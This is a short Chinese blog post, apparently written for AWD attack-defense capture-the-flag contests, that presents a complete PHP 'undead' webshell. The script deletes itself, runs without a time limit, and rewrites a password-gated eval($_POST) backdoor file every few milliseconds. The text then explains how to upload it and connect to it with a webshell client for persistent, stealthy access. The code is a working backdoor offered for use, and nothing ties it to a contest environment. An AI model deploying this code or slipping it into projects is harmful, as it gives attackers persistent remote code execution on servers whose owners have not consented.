美文网首页
awd中的不死马使用

awd中的不死马使用

作者: ifqu | 来源:发表于2018-06-13 10:26 被阅读0次
<?php 
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '2.php';
$code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
while (1){
    file_put_contents($file,$code);
    usleep(5000);
}
?>

在awd中不死马对于持续获取用户权限是十分有帮助的,将这个文件上传到服务器,然后进行访问,会在该路径下一直生成一个名字为2.php的shell文件,然后使用caidao输入http://xxx/2.php?pass=pass的路径,密码为a就可以链接一句话,由于pass是md5加密很难被破解也可以做到隐蔽,md5值可以随意定义。

相关文章

  • awd中的不死马使用

    在awd中不死马对于持续获取用户权限是十分有帮助的,将这个文件上传到服务器,然后进行访问,会在该路径下一直生成一个...

  • AWD笔记

    AWD笔记 一、框架攻击脚本运行 测试,攻击npc 正式攻击 二、杀不死马 通用方法chmod 755 csscd...

  • awd攻防之kill 不死马

    1.pwn题目 题目预设条件: 官方给了一个ctf用户给我们,并且用一个root权限的守护进程去监听一个给定的端口...

  • python使用技巧

    1 使用colorama库带颜色输出日志 2 pwn awd模板 awd模式千万不要使得单个脚本功能太过庞大,脚本...

  • CTF线下赛AWD小结(搬运+整理)

    AWD模式简介 AWD:Attack With Defence,比赛中每个队伍维护多台服务器,服务器中存在多个漏洞...

  • 我的骄傲的

    AWD阿大为的

  • AWD

    思路 0x00 登入服务器并修改密码 linux常用命令查看用户名:who,whoami修改密码:passwd压缩...

  • AWD攻略笔记

    AWD真好玩 开局一张图,内容全靠编 AWD是什么 Attack With Defence,简而言之就是你既是一个...

  • AWD-LSTM为什么这么棒?

    摘要:AWD-LSTM为什么这么棒,看完你就明白啦! AWD-LSTM是目前最优秀的语言模型之一。在众多的顶会论文...

  • 死马的故事

    突然回想起来的场景是高考结束以后,我穿着背带长裤,18岁的女孩微胖的,在我家屋后的小河里站着,旁边是我和丽丽偷...

网友评论

      本文标题:awd中的不死马使用

      本文链接:https://www.haomeiwen.com/subject/vvadeftx.html